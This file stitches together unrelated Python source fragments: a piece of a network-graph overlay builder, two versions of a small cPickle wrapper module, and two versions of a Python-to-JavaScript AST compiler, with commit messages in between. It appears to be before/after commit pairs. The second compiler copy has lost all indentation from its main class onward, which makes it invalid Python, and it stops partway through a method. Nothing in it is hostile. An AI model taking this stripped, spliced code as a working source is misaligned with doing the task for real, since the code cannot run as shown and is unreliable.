    for edge in exploded_edges:
        edge.multipoint = True
        edge.src_int.multipoint = True
        edge.dst_int.multipoint = True
@call_log
def build_conn(anm):
    """Build the directed connectivity overlay from physical links."""
    g_conn = anm.add_overlay("conn", directed=True)
    input_graph = anm['input']
    g_conn.add_nodes_from(input_graph, retain=['label'])
    g_conn.add_edges_from(input_graph.edges(type="physical"))
|
# -*- coding: utf-8 -*-
"""Thin wrappers around cPickle that default to the highest protocol."""
import cPickle
# Loading needs no protocol choice, so the stdlib callables are
# re-exported unchanged.
load = cPickle.load
loads = cPickle.loads
def dump(obj, f):
    """Pickle obj to file f using the highest protocol.

    Returns cPickle.dump's result (None) for call-through convenience.
    """
    return cPickle.dump(obj, f, protocol=cPickle.HIGHEST_PROTOCOL)
def dumps(obj):
    """Return obj pickled to a str using the highest protocol."""
    return cPickle.dumps(obj, protocol=cPickle.HIGHEST_PROTOCOL)
jukoro.pickle docstrings
# -*- coding: utf-8 -*-
"""
Module to pickle/unpickle Python objects using highest pickle protocol
by default
"""
import cPickle
# Loading needs no protocol argument, so the stdlib callables are
# re-exported unchanged.
load = cPickle.load
loads = cPickle.loads
def dump(obj, f):
    """
    Write an object in pickle format to the given file
    :param obj: object to pickle
    :param f: file to write pickled object to
    """
    cPickle.dump(obj, f, protocol=cPickle.HIGHEST_PROTOCOL)
def dumps(obj):
    """
    Return a string containing an object in pickle format
    :param obj: object to pickle
    :return: pickled object
    :rtype: str
    """
    return cPickle.dumps(obj, protocol=cPickle.HIGHEST_PROTOCOL)
|
# -*- coding: utf-8 -*-
#==============================================================================
# Copyright: Hybrid Labs
# Licence: See LICENSE
#==============================================================================
from __future__ import absolute_import
import ast
import inspect
import json
import sys
from types import ModuleType
class JSCode(object):
    """Marker class for verbatim JavaScript snippets.

    The compiler special-cases calls to a name bound to JSCode and emits
    the first (string) argument unchanged; the instance itself is never
    used, so the constructor discards its argument.
    """
    def __init__(self, code):
        pass
class YieldPoint(object):
    """Hands out consecutive integer state labels, starting at 1."""
    def __init__(self):
        # Number of labels allocated so far; also the last label returned.
        self.count = 0
    def create(self):
        """Allocate the next label and return it."""
        next_label = self.count + 1
        self.count = next_label
        return next_label
class YieldSearch(ast.NodeVisitor):
    """AST visitor recording whether a yield occurs in the visited tree.

    Nested function definitions are deliberately not descended into:
    their yields belong to the inner function, not the one being tested.
    """
    # Class-level default so reading found_yield before any Yield is seen
    # no longer raises AttributeError (callers previously had to pre-seed
    # the attribute themselves).
    found_yield = False
    def visit_Yield(self, node):
        self.found_yield = True
    def visit_FunctionDef(self, node):
        # Do not recurse: inner functions own their yields.
        pass
class JSCompiler(ast.NodeVisitor):
    """Compile a Python AST into JavaScript source text.

    Each visit_* method returns a string or a list of strings of
    JavaScript. Function bodies are emitted as resumable state machines
    (a switch on $ctx.next_state inside a while(true) loop) with state
    labels allocated from a YieldPoint, so yield, for/while loops and
    try/except can all be expressed as jumps between numbered cases.
    """
    # Python identifiers that collide with JavaScript reserved words;
    # safe_name() appends an underscore to these.
    KEYWORDS = ['default', 'switch', 'throw']
    BOOL_OP = {
        ast.And: '&&',
        ast.Or: '||',
    }
    BIN_OP = {
        ast.Add: '+',
        ast.Sub: '-',
        ast.Mult: '*',
        ast.Div: '/',
        ast.Mod: '%',
        ast.LShift: '<<',
        ast.RShift: '>>',
        ast.BitOr: '|',
        ast.BitXor: '^',
        ast.BitAnd: '&',
    }
    UNARY_OP = {
        ast.Invert: '~',
        ast.Not: '!',
        ast.UAdd: '+',
        ast.USub: '-',
    }
    COMPARE_OP = {
        ast.Eq: '==',
        ast.NotEq: '!=',
        ast.Lt: '<',
        ast.LtE: '<=',
        ast.Gt: '>',
        ast.GtE: '>=',
        ast.Is: '===',
        ast.IsNot: '!==',
    }
    def __init__(self, obj):
        # obj is the thing being compiled; its defining module is kept
        # for name resolution in lookup().
        self.obj = obj
        self.node_chain = [None]
        if isinstance(obj, ModuleType):
            self.module = obj
        else:
            self.module = sys.modules.get(getattr(obj, '__module__', None))
    def visit(self, node, context=None, inherit=True):
        """Visit a node, threading parent/context/state links onto it.

        When inherit is true, the node inherits yield_point, loop_point,
        break_point and (if not already set) context from its parent.
        """
        node.parent = self.node_chain[-1]
        node.context = getattr(node, 'context', context)
        if inherit and node.parent:
            node.yield_point = getattr(node.parent, 'yield_point', None)
            node.loop_point = getattr(node.parent, 'loop_point', None)
            node.break_point = getattr(node.parent, 'break_point', None)
            node.context = node.context or node.parent.context
        else:
            node.yield_point = None
            node.loop_point = None
            node.break_point = None
        self.node_chain.append(node)
        ret = super(JSCompiler, self).visit(node)
        self.node_chain.pop()
        return ret
    def lookup(self, name):
        """Resolve a bare name to its JavaScript spelling, or None if it
        is not found in the types/builtins support modules or the source
        module."""
        from . import types, builtins
        from .. import client, model
        if name == 'object':
            return 'Object'
        elif name == 'print':
            return name
        value = (getattr(types, name, None) or getattr(builtins, name, None) or
                 getattr(self.module, name, None))
        if value is None:
            return None
        elif value is client.session:
            return '_session'
        elif value is model.model:
            return 'avalon.model'
        return self.safe_name(name)
    def safe_name(self, name):
        # Avoid emitting JavaScript reserved words as identifiers.
        if name in JSCompiler.KEYWORDS:
            return name + '_'
        return name
    def generic_visit(self, node):
        # Any node type without an explicit visitor is unsupported.
        raise NotImplementedError(node)
    # Module(stmt* body)
    def visit_Module(self, node):
        tpl = []
        for child in node.body:
            extend(tpl, self.visit(child))
        return '\n'.join(tpl)
    # Return(expr? value)
    def visit_Return(self, node):
        if node.value:
            return 'return {0};'.format(self.visit(node.value))
        else:
            return 'return;'
    # FunctionDef(
    #   identifier name, arguments args, stmt* body, expr* decorator_list)
    def visit_FunctionDef(self, node, bound=False):
        # Emits the function as a $ctx-driven state machine; when bound,
        # the first argument is bound to `this` instead of being passed.
        context = node.context or 'this'
        args = [self.visit(a, inherit=False) for a in node.args.args]
        arg0 = args[0] if bound else None
        args = args[1:] if bound else args
        local = ', '.join(['{0}: {0}'.format(a) for a in args])
        args = ', '.join(args)
        node.name = self.safe_name(node.name)
        tpl = [
            '{0}.{1} = function {1}({2}) {{'.format(context, node.name, args),
            ' var $exception;',
            ' var $ctx = {next_state: 0, ctx: this, try_stack: []};',
            ' $ctx.local = {{{0}}};'.format(local),
            ' $ctx.local.{0} = this;'.format(arg0) if arg0 else '',
            ' $ctx.func = function($ctx) {',
            ' while (true) try { switch($ctx.next_state) {',
            ' case 0:'
        ]
        # Fresh state-label allocator for this function's state machine.
        node.yield_point = YieldPoint()
        for c in node.body:
            extend(tpl, indent(self.visit(c, '$ctx.local'), level=3))
        extend(tpl, [
            ' default: $ctx.end = true; return;',
            ' }} catch($e) {',
            ' $exception = $e;',
            ' $ctx.next_state = $ctx.try_stack.pop();',
            ' if ($ctx.next_state === undefined) throw $exception;',
            ' continue;',
            ' }',
            ' }',
        ])
        if is_generator(node):
            extend(tpl, indent('return new generator($ctx);'))
        else:
            extend(tpl, indent('return $ctx.func.call(this, $ctx);'))
        extend(tpl, '};')
        return tpl
    #ClassDef(identifier name, expr* bases, stmt* body, expr* decorator_list)
    def visit_ClassDef(self, node):
        from .. import client
        if len(node.bases) > 1:
            raise NotImplementedError('Multiple inheritance not supported')
        tpl = []
        context = node.context or 'this'
        if node.bases:
            if isinstance(node.bases[0], ast.Attribute):
                scope_name = node.bases[0].attr
                scope = client._scopes.get(scope_name, None)
                if scope:
                    return self.visit_ClientScope(node, scope)
        args = []
        for c in node.body:
            if isinstance(c, ast.FunctionDef) and c.name == '__init__':
                args = [self.visit(a, inherit=False) for a in c.args.args]
        # Constructor
        node.name = self.safe_name(node.name)
        extend(tpl, '{0}.{1} = function {1}({2}) {{'.format(
            context, node.name, ', '.join(args[1:])))
        # Allow object creation without using `new`
        extend(tpl, ' if (!(this instanceof {0})) return new {0}({1});'.
            format(node.name, ', '.join(args[1:])))
        for c in node.body:
            if not isinstance(c, ast.FunctionDef):
                extend(tpl, indent(self.visit(c)))
        extend(tpl, ' if (this.__init__) this.__init__({0});'.
            format(', '.join(args[1:])))
        extend(tpl, '};')
        # Class body
        prototype = '%s.%s.prototype' % (context, node.name)
        if node.bases:
            extend(tpl, [
                'var $F = function() {};',
                '$F.prototype = %s.prototype;' % self.visit(node.bases[0]),
                '%s.%s.prototype = new $F();' % (context, node.name)
            ])
        for c in node.body:
            if isinstance(c, ast.FunctionDef):
                c.context = prototype
                extend(tpl, self.visit_FunctionDef(c, bound=True))
        return tpl
    def visit_ClientScope(self, node, scope):
        # Emits the class as an AngularJS-style controller bound to
        # $scope/$element, wiring up the scope's registered events.
        context = node.context or 'this'
        inject = ['$scope', '$element']
        tpl = [
            '{0}.{1} = function {2}({3}) {{'.format(
                context, scope['name'], node.name, ', '.join(inject))
        ]
        for c in node.body:
            extend(tpl, indent(self.visit(c, '$scope')))
        # Events
        tpl_on = '\n'.join(indent([
            '$element.on("{0}", "{1}", function eventHandler(e) {{',
            ' var t = angular.element(e.target).scope();',
            ' $scope.$apply(function() {{ $scope.{2}($scope, t, e) }});',
            '}})'
        ]))
        extend(tpl, [tpl_on.format(*e) for e in scope['events']])
        extend(tpl, indent([
            '$scope.$on("$destroy", function() {',
            ' $element.off();',
            '})'
        ]))
        # Support repeat scope
        extend(tpl, indent([
            'var $getattr = $scope.__getattr__;',
            '$scope.__getattr__ = function __getattr__(self, value) {',
            ' return self.$item && self.$item[value] ||',
            ' $getattr && $getattr(self, value);',
            '}'
        ]))
        # Scope constructor
        extend(tpl, indent([
            'if ($scope.__init__) {',
            ' var __init__ = $scope.__init__;',
            ' delete $scope.__init__;',
            ' __init__($scope);',
            '}'
        ]))
        return extend(tpl, [
            '};', '{0}.{1}.$inject = {2};'.format(
                context, scope['name'], json.dumps(inject))
        ])
    # Assign(expr* targets, expr value)
    def visit_Assign(self, node):
        tpl = []
        context = getattr(node, 'context', None)
        if isinstance(node.value, ast.Yield):
            # A yield on the right-hand side: the resumed value arrives
            # through $ctx.send.
            if getattr(node, 'yield_point', None):
                node.value.yield_point = node.yield_point
            extend(tpl, self.visit(node.value))
            extend(tpl, 'var $assign = $ctx.send;')
        else:
            extend(tpl, 'var $assign = {0};'.format(self.visit(node.value)))
        for target in node.targets:
            if isinstance(target, ast.Tuple):
                # Tuple targets unpack $assign by index.
                for i, t in enumerate(target.elts):
                    t = self.visit(t)
                    if not context:
                        tpl.append('var {0} = $assign[{1}];'.format(t, i))
                    # NOTE(review): with no context both the var declaration
                    # above and the plain assignment below are emitted for
                    # the same target.
                    tpl.append('{0} = $assign[{1}];'.format(t, i))
            else:
                target = self.visit(target)
                if not context:
                    tpl.append('var {0} = $assign;'.format(target))
                tpl.append('{0} = $assign;'.format(target))
        return tpl
    # AugAssign(expr target, operator op, expr value)
    def visit_AugAssign(self, node):
        target = self.visit(node.target)
        op = JSCompiler.BIN_OP[type(node.op)]
        value = self.visit(node.value)
        return '{0} {1}= {2};'.format(target, op, value)
    # For(expr target, expr iter, stmt* body, stmt* orelse)
    def visit_For(self, node):
        # Compiled to explicit states: loop head, break target, and a
        # try/except pair that catches StopIteration from iter.next().
        if node.orelse:
            raise NotImplementedError('For else statement not supported')
        if not hasattr(node, 'yield_point'):
            raise SyntaxError('For statement not inside a function block')
        tpl = []
        node.loop_point = loop_point = node.yield_point.create()
        node.break_point = break_point = node.yield_point.create()
        try_except_point = node.yield_point.create()
        try_continue_point = node.yield_point.create()
        target_node = ast.Name('iter', None)
        assign_node = ast.Assign([target_node], node.iter)
        assign_node.context = '$ctx.local'
        extend(tpl, self.visit_Assign(assign_node))
        extend(tpl, [
            'case {0}:'.format(loop_point),
            '$ctx.try_stack.push({0});'.format(try_except_point),
            '{0} = $ctx.local.iter.next();'.format(self.visit(node.target)),
            '$ctx.try_stack.pop();',
            '$ctx.next_state = {0}; continue;'.format(try_continue_point),
            'case {0}:'.format(try_except_point),
            'if ($exception instanceof StopIteration) {',
            ' $ctx.next_state = {0}; continue; '.format(break_point),
            '}',
            'throw $exception;',
            'case {0}:'.format(try_continue_point)
        ])
        for c in node.body:
            extend(tpl, self.visit(c, '$ctx.local'))
        extend(tpl, [
            '$ctx.next_state = {0}; continue;'.format(loop_point),
            'case {0}:'.format(break_point)
        ])
        return tpl
    # While(expr test, stmt* body, stmt* orelse)
    def visit_While(self, node):
        if node.orelse:
            raise NotImplementedError('While else statement not supported')
        if not hasattr(node, 'yield_point'):
            raise SyntaxError('While statement not inside a function block')
        tpl = []
        loop_point = node.yield_point.create()
        break_point = node.yield_point.create()
        extend(tpl, [
            'case {0}:'.format(loop_point),
            'if (!({0})) {{'.format(self.visit(node.test)),
            ' $ctx.next_state = {0}; continue;'.format(break_point),
            '}'
        ])
        for c in node.body:
            extend(tpl, self.visit(c, '$ctx.local'))
        extend(tpl, [
            '$ctx.next_state = {0}; continue;'.format(loop_point),
            'case {0}:'.format(break_point)
        ])
        return tpl
    # Print(expr? dest, expr* values, bool nl)
    def visit_Print(self, node):
        return 'console.log({0});'.format(
            ', '.join([self.visit(v) for v in node.values]))
    # If(expr test, stmt* body, stmt* orelse)
    def visit_If(self, node):
        tpl = ['if ({0}) {{'.format(self.visit(node.test))]
        for c in node.body:
            extend(tpl, indent(self.visit(c)))
        tpl.append('}')
        if node.orelse:
            tpl.append('else {')
            for c in node.orelse:
                extend(tpl, indent(self.visit(c)))
            tpl.append('}')
        return tpl
    # Py2: Raise(expr? type, expr? inst, expr? tback)
    # Py3: Raise(expr? exc, expr? cause)
    def visit_Raise(self, node):
        if hasattr(node, 'type'):
            return 'throw {0}'.format(self.visit(node.type))
        else:
            return 'throw {0}'.format(self.visit(node.exc))
    # TryExcept(stmt* body, excepthandler* handlers, stmt* orelse)
    def visit_TryExcept(self, node):
        # The handler's state label is pushed onto $ctx.try_stack so the
        # state machine's catch clause can jump to it.
        if not getattr(node, 'yield_point', None):
            raise SyntaxError('Try block not inside a function block')
        try_except_point = node.yield_point.create()
        try_continue_point = node.yield_point.create()
        tpl = ['$ctx.try_stack.push({0});'.format(try_except_point)]
        for c in node.body:
            extend(tpl, self.visit(c))
        extend(tpl, [
            '$ctx.try_stack.pop();',
            '$ctx.next_state = {0}; continue;'.format(try_continue_point),
            'case {0}:'.format(try_except_point)
        ])
        for c in node.handlers:
            extend(tpl, self.visit(c))
        extend(tpl, 'case {0}:'.format(try_continue_point))
        return tpl
    # Try(stmt* body, excepthandler* handlers, stmt* orelse, stmt* finalbody)
    def visit_Try(self, node):
        return self.visit_TryExcept(node)
    # Import(alias* names)
    def visit_Import(self, node):
        return ''
    # ImportFrom(identifier? module, alias* names, int? level)
    def visit_ImportFrom(self, node):
        return ''
    # Expr(expr value)
    def visit_Expr(self, node):
        return self.visit(node.value)
    # Pass
    def visit_Pass(self, node):
        return ['// pass']
    # Break
    def visit_Break(self, node):
        if not node.break_point:
            raise SyntaxError('Break not inside a loop block')
        return '$ctx.next_state = {0}; continue;'.format(node.break_point)
    # Continue
    def visit_Continue(self, node):
        if not node.loop_point:
            raise SyntaxError('Continue not inside a loop block')
        return '$ctx.next_state = {0}; continue;'.format(node.loop_point)
    # BoolOp(boolop op, expr* values)
    def visit_BoolOp(self, node):
        op = JSCompiler.BOOL_OP[type(node.op)]
        return '({0})'.format(op.join([self.visit(v) for v in node.values]))
    # BinOp(expr left, operator op, expr right)
    def visit_BinOp(self, node):
        left = self.visit(node.left)
        op = JSCompiler.BIN_OP[type(node.op)]
        right = self.visit(node.right)
        return '{0} {1} {2}'.format(left, op, right)
    # UnaryOp(unaryop op, expr operand)
    def visit_UnaryOp(self, node):
        op = JSCompiler.UNARY_OP[type(node.op)]
        operand = self.visit(node.operand)
        return '{0}({1})'.format(op, operand)
    # Dict(expr* keys, expr* values)
    def visit_Dict(self, node):
        return '{{ {0} }}'.format(', '.join([
            '{0}: {1}'.format(self.visit(kv[0]), self.visit(kv[1]))
            for kv in zip(node.keys, node.values)
        ]))
    # Yield(expr? value)
    def visit_Yield(self, node):
        # Stash the yielded value, record the resume state, and return
        # the context; execution resumes at the emitted case label.
        if not getattr(node, 'yield_point', None):
            raise SyntaxError('Yield not inside a function block')
        yield_point = node.yield_point.create()
        return [
            'var $tmp = {0};'.format(self.visit(node.value)),
            '$ctx.next_state = {0};'.format(yield_point),
            '$ctx.result = $tmp;',
            'return $ctx;',
            'case {0}:'.format(yield_point),
        ]
    #Compare(expr left, cmpop* ops, expr* comparators)
    def visit_Compare(self, node):
        # Chained comparisons (a < b < c) become pairwise && chains.
        left = self.visit(node.left)
        ops = [JSCompiler.COMPARE_OP[type(op)] for op in node.ops]
        comparators = [self.visit(c) for c in node.comparators]
        tpl = []
        for op, right in zip(ops, comparators):
            tpl.append('{0} {1} {2}'.format(left, op, right))
            left = right
        return '&&'.join(tpl)
    # Call(
    #   expr func, expr* args, keyword* keywords, xpr? starargs, expr? kwargs)
    def visit_Call(self, node):
        func = self.visit(node.func)
        if isinstance(node.func, ast.Attribute):
            func_context = self.visit(node.func.value)
        else:
            func_context = 'this'
        # Calls to a name bound to JSCode emit the raw JS string argument.
        if getattr(self.module, func, None) is JSCode:
            return node.args[0].s
        if func == 'print':
            node.values = node.args
            return self.visit_Print(node)
        args = ', '.join([self.visit(a) for a in node.args])
        return '{0}.apply({1}, [{2}])'.format(func, func_context, args)
    # Num(object n)
    def visit_Num(self, node):
        return str(node.n)
    # Str(string s)
    def visit_Str(self, node):
        return '"{0}"'.format(node.s).replace('\n', '\\n\\\n')
    # Attribute(expr value, identifier attr, expr_context ctx)
    def visit_Attribute(self, node):
        if isinstance(node.ctx, ast.Load):
            tpl = 'getattr({0}, "{1}")'
        else:
            tpl = '{0}.{1}'
        return tpl.format(self.visit(node.value), node.attr)
    # Subscript(expr value, slice slice, expr_context ctx)
    def visit_Subscript(self, node):
        value = self.visit(node.value)
        index = self.visit(node.slice)
        return '{0}[{1}]'.format(value, index)
    # Name(identifier id, expr_context ctx)
    def visit_Name(self, node):
        lookup = self.lookup(node.id)
        if lookup:
            return lookup
        elif node.id == 'None':
            return 'undefined'
        elif node.id == 'True':
            return 'true'
        elif node.id == 'False':
            return 'false'
        if getattr(node, 'context', None):
            return '{0}.{1}'.format(node.context, node.id)
        else:
            return node.id
    # List(expr* elts, expr_context ctx)
    def visit_List(self, node):
        return '[{0}]'.format(', '.join([self.visit(c) for c in node.elts]))
    # Tuple(expr* elts, expr_context ctx)
    def visit_Tuple(self, node):
        return '[{0}]'.format(', '.join([self.visit(c) for c in node.elts]))
    # Index(expr value)
    def visit_Index(self, node):
        return self.visit(node.value)
    # ExceptHandler(expr? type, identifier? name, stmt* body)
    def visit_ExceptHandler(self, node):
        tpl = []
        if node.type:
            tpl.append('if ($exception instanceof {0}) {{'.format(
                self.visit(node.type)))
        else:
            tpl.append('if ($exception) {')
        for c in node.body:
            extend(tpl, indent(self.visit(c)))
        tpl.append(indent('$exception = undefined;'))
        tpl.append('}')
        return tpl
    # arg = (identifier arg, expr? annotation)
    def visit_arg(self, node):
        return str(node.arg)
def indent(lines, spaces=2, level=1):
    """Prefix *lines* (a string, or a list of strings) with whitespace.

    The prefix is spaces * level space characters; lists are indented
    element-wise and returned as a new list.
    """
    prefix = ' ' * (spaces * level)
    if isinstance(lines, list):
        return [prefix + line for line in lines]
    return prefix + lines
def extend(template, lines):
    """Append *lines* to *template* in place and return *template*.

    A list is spliced in element-by-element; any other value (including
    strings and tuples) is appended as a single item.
    """
    if not isinstance(lines, list):
        lines = [lines]
    template.extend(lines)
    return template
def is_generator(node):
    """Return True if *node* directly contains a yield.

    For a FunctionDef only its own statements are searched; YieldSearch
    does not descend into nested function definitions.
    """
    searcher = YieldSearch()
    searcher.found_yield = False
    if isinstance(node, ast.FunctionDef):
        targets = node.body
    else:
        targets = [node]
    for target in targets:
        searcher.visit(target)
    return searcher.found_yield
def js_compile(obj):
    """Compile *obj* (function, class or module) to JavaScript source.

    The result is cached on the object's __js__ attribute, so each
    object is parsed and compiled at most once.
    """
    if not getattr(obj, '__js__', None):
        node = ast.parse(inspect.getsource(obj))
        obj.__js__ = JSCompiler(obj).visit(node)
    return obj.__js__
def runtime():
    """Return the JavaScript runtime support code: the compiled types
    and builtins modules, concatenated."""
    from . import types, builtins
    return js_compile(types) + js_compile(builtins)
Compiler: rename yield point to branch and cleanup
# -*- coding: utf-8 -*-
#==============================================================================
# Copyright: Hybrid Labs
# Licence: See LICENSE
#==============================================================================
from __future__ import absolute_import
import ast
import inspect
import json
import sys
from types import ModuleType
class JSCode(object):
    """Marker class for verbatim JavaScript snippets.

    The compiler special-cases calls to a name bound to JSCode and emits
    the string argument unchanged; the instance itself is never used, so
    the constructor discards its argument.
    """
    def __init__(self, code):
        pass
class BranchPoint(object):
    """Allocates consecutive integer state labels, starting at 1."""
    def __init__(self):
        # Number of labels handed out so far; also the last label issued.
        self.count = 0
    def create(self):
        """Reserve the next label and return it."""
        label = self.count + 1
        self.count = label
        return label
class YieldSearch(ast.NodeVisitor):
    """AST visitor recording whether a yield occurs in the visited tree.

    Nested function definitions are deliberately not descended into:
    their yields belong to the inner function, not the one being tested.
    """
    # Class-level default so reading found_yield before any Yield is seen
    # no longer raises AttributeError (callers previously had to pre-seed
    # the attribute themselves).
    found_yield = False
    def visit_Yield(self, node):
        self.found_yield = True
    def visit_FunctionDef(self, node):
        # Do not recurse: inner functions own their yields.
        pass
class JSCompiler(ast.NodeVisitor):
KEYWORDS = ['default', 'switch', 'throw']
BOOL_OP = {
ast.And: '&&',
ast.Or: '||',
}
BIN_OP = {
ast.Add: '+',
ast.Sub: '-',
ast.Mult: '*',
ast.Div: '/',
ast.Mod: '%',
ast.LShift: '<<',
ast.RShift: '>>',
ast.BitOr: '|',
ast.BitXor: '^',
ast.BitAnd: '&',
}
UNARY_OP = {
ast.Invert: '~',
ast.Not: '!',
ast.UAdd: '+',
ast.USub: '-',
}
COMPARE_OP = {
ast.Eq: '==',
ast.NotEq: '!=',
ast.Lt: '<',
ast.LtE: '<=',
ast.Gt: '>',
ast.GtE: '>=',
ast.Is: '===',
ast.IsNot: '!==',
}
def __init__(self, obj):
self.obj = obj
self.node_chain = [None]
if isinstance(obj, ModuleType):
self.module = obj
else:
self.module = sys.modules.get(getattr(obj, '__module__', None))
def visit(self, node, context=None, inherit=True):
node.parent = self.node_chain[-1]
node.context = getattr(node, 'context', context)
if inherit and node.parent:
node.branch = getattr(node.parent, 'branch', None)
node.loop_point = getattr(node.parent, 'loop_point', None)
node.break_point = getattr(node.parent, 'break_point', None)
node.context = node.context or node.parent.context
else:
node.branch = None
node.loop_point = None
node.break_point = None
self.node_chain.append(node)
ret = super(JSCompiler, self).visit(node)
self.node_chain.pop()
return ret
def lookup(self, name):
from . import types, builtins
from .. import client, model
if name == 'object':
return 'Object'
elif name == 'print':
return name
value = (getattr(types, name, None) or getattr(builtins, name, None) or
getattr(self.module, name, None))
if value is None:
return None
elif value is client.session:
return '_session'
elif value is model.model:
return 'avalon.model'
return self.safe_name(name)
def safe_name(self, name):
if name in JSCompiler.KEYWORDS:
return name + '_'
return name
def generic_visit(self, node):
raise NotImplementedError(node)
# Module(stmt* body)
def visit_Module(self, node):
tpl = []
for child in node.body:
extend(tpl, self.visit(child))
return '\n'.join(tpl)
# Return(expr? value)
def visit_Return(self, node):
if node.value:
return 'return {0};'.format(self.visit(node.value))
else:
return 'return;'
# FunctionDef(
# identifier name, arguments args, stmt* body, expr* decorator_list)
def visit_FunctionDef(self, node, bound=False):
context = node.context or 'this'
args = [self.visit(a, inherit=False) for a in node.args.args]
arg0 = args[0] if bound else None
args = args[1:] if bound else args
local = ', '.join(['{0}: {0}'.format(a) for a in args])
args = ', '.join(args)
node.name = self.safe_name(node.name)
tpl = [
'{0}.{1} = function {1}({2}) {{'.format(context, node.name, args),
' var $exception;',
' var $ctx = {next_state: 0, ctx: this, try_stack: []};',
' $ctx.local = {{{0}}};'.format(local),
' $ctx.local.{0} = this;'.format(arg0) if arg0 else '',
' $ctx.func = function($ctx) {',
' while (true) try { switch($ctx.next_state) {',
' case 0:'
]
node.branch = BranchPoint()
for c in node.body:
extend(tpl, indent(self.visit(c, '$ctx.local'), level=3))
extend(tpl, [
' default: $ctx.end = true; return;',
' }} catch($e) {',
' $exception = $e;',
' $ctx.next_state = $ctx.try_stack.pop();',
' if ($ctx.next_state === undefined) throw $exception;',
' continue;',
' }',
' }',
])
if is_generator(node):
extend(tpl, indent('return new generator($ctx);'))
else:
extend(tpl, indent('return $ctx.func.call(this, $ctx);'))
extend(tpl, '};')
return tpl
#ClassDef(identifier name, expr* bases, stmt* body, expr* decorator_list)
def visit_ClassDef(self, node):
from .. import client
if len(node.bases) > 1:
raise NotImplementedError('Multiple inheritance not supported')
tpl = []
context = node.context or 'this'
if node.bases:
if isinstance(node.bases[0], ast.Attribute):
scope_name = node.bases[0].attr
scope = client._scopes.get(scope_name, None)
if scope:
return self.visit_ClientScope(node, scope)
args = []
for c in node.body:
if isinstance(c, ast.FunctionDef) and c.name == '__init__':
args = [self.visit(a, inherit=False) for a in c.args.args]
# Constructor
node.name = self.safe_name(node.name)
extend(tpl, '{0}.{1} = function {1}({2}) {{'.format(
context, node.name, ', '.join(args[1:])))
# Allow object creation without using `new`
extend(tpl, ' if (!(this instanceof {0})) return new {0}({1});'.
format(node.name, ', '.join(args[1:])))
for c in node.body:
if not isinstance(c, ast.FunctionDef):
extend(tpl, indent(self.visit(c)))
extend(tpl, ' if (this.__init__) this.__init__({0});'.
format(', '.join(args[1:])))
extend(tpl, '};')
# Class body
prototype = '%s.%s.prototype' % (context, node.name)
if node.bases:
extend(tpl, [
'var $F = function() {};',
'$F.prototype = %s.prototype;' % self.visit(node.bases[0]),
'%s.%s.prototype = new $F();' % (context, node.name)
])
for c in node.body:
if isinstance(c, ast.FunctionDef):
c.context = prototype
extend(tpl, self.visit_FunctionDef(c, bound=True))
return tpl
def visit_ClientScope(self, node, scope):
context = node.context or 'this'
inject = ['$scope', '$element']
tpl = [
'{0}.{1} = function {2}({3}) {{'.format(
context, scope['name'], node.name, ', '.join(inject))
]
for c in node.body:
extend(tpl, indent(self.visit(c, '$scope')))
# Events
tpl_on = '\n'.join(indent([
'$element.on("{0}", "{1}", function eventHandler(e) {{',
' var t = angular.element(e.target).scope();',
' $scope.$apply(function() {{ $scope.{2}($scope, t, e) }});',
'}})'
]))
extend(tpl, [tpl_on.format(*e) for e in scope['events']])
extend(tpl, indent([
'$scope.$on("$destroy", function() {',
' $element.off();',
'})'
]))
# Support repeat scope
extend(tpl, indent([
'var $getattr = $scope.__getattr__;',
'$scope.__getattr__ = function __getattr__(self, value) {',
' return self.$item && self.$item[value] ||',
' $getattr && $getattr(self, value);',
'}'
]))
# Scope constructor
extend(tpl, indent([
'if ($scope.__init__) {',
' var __init__ = $scope.__init__;',
' delete $scope.__init__;',
' __init__($scope);',
'}'
]))
return extend(tpl, [
'};', '{0}.{1}.$inject = {2};'.format(
context, scope['name'], json.dumps(inject))
])
# Assign(expr* targets, expr value)
def visit_Assign(self, node):
tpl = []
if isinstance(node.value, ast.Yield):
extend(tpl, self.visit(node.value))
extend(tpl, 'var $assign = $ctx.send;')
else:
extend(tpl, 'var $assign = {0};'.format(self.visit(node.value)))
for target in node.targets:
if isinstance(target, ast.Tuple):
for i, t in enumerate(target.elts):
t = self.visit(t)
if not node.context:
tpl.append('var {0} = $assign[{1}];'.format(t, i))
tpl.append('{0} = $assign[{1}];'.format(t, i))
else:
target = self.visit(target)
if not node.context:
tpl.append('var {0} = $assign;'.format(target))
tpl.append('{0} = $assign;'.format(target))
return tpl
# AugAssign(expr target, operator op, expr value)
def visit_AugAssign(self, node):
target = self.visit(node.target)
op = JSCompiler.BIN_OP[type(node.op)]
value = self.visit(node.value)
return '{0} {1}= {2};'.format(target, op, value)
# For(expr target, expr iter, stmt* body, stmt* orelse)
def visit_For(self, node):
if node.orelse:
raise NotImplementedError('For else statement not supported')
if not node.branch:
raise SyntaxError('For statement not inside a function block')
tpl = []
node.loop_point = loop_point = node.branch.create()
node.break_point = break_point = node.branch.create()
try_except_point = node.branch.create()
try_continue_point = node.branch.create()
target_node = ast.Name('iter', None)
assign_node = ast.Assign([target_node], node.iter)
assign_node.context = '$ctx.local'
extend(tpl, self.visit_Assign(assign_node))
extend(tpl, [
'case {0}:'.format(loop_point),
'$ctx.try_stack.push({0});'.format(try_except_point),
'{0} = $ctx.local.iter.next();'.format(self.visit(node.target)),
'$ctx.try_stack.pop();',
'$ctx.next_state = {0}; continue;'.format(try_continue_point),
'case {0}:'.format(try_except_point),
'if ($exception instanceof StopIteration) {',
' $ctx.next_state = {0}; continue; '.format(break_point),
'}',
'throw $exception;',
'case {0}:'.format(try_continue_point)
])
for c in node.body:
extend(tpl, self.visit(c, '$ctx.local'))
extend(tpl, [
'$ctx.next_state = {0}; continue;'.format(loop_point),
'case {0}:'.format(break_point)
])
return tpl
# While(expr test, stmt* body, stmt* orelse)
def visit_While(self, node):
if node.orelse:
raise NotImplementedError('While else statement not supported')
if not node.branch:
raise SyntaxError('While statement not inside a function block')
tpl = []
loop_point = node.branch.create()
break_point = node.branch.create()
extend(tpl, [
'case {0}:'.format(loop_point),
'if (!({0})) {{'.format(self.visit(node.test)),
' $ctx.next_state = {0}; continue;'.format(break_point),
'}'
])
for c in node.body:
extend(tpl, self.visit(c, '$ctx.local'))
extend(tpl, [
'$ctx.next_state = {0}; continue;'.format(loop_point),
'case {0}:'.format(break_point)
])
return tpl
# Print(expr? dest, expr* values, bool nl)
def visit_Print(self, node):
return 'console.log({0});'.format(
', '.join([self.visit(v) for v in node.values]))
# If(expr test, stmt* body, stmt* orelse)
def visit_If(self, node):
tpl = ['if ({0}) {{'.format(self.visit(node.test))]
for c in node.body:
extend(tpl, indent(self.visit(c)))
tpl.append('}')
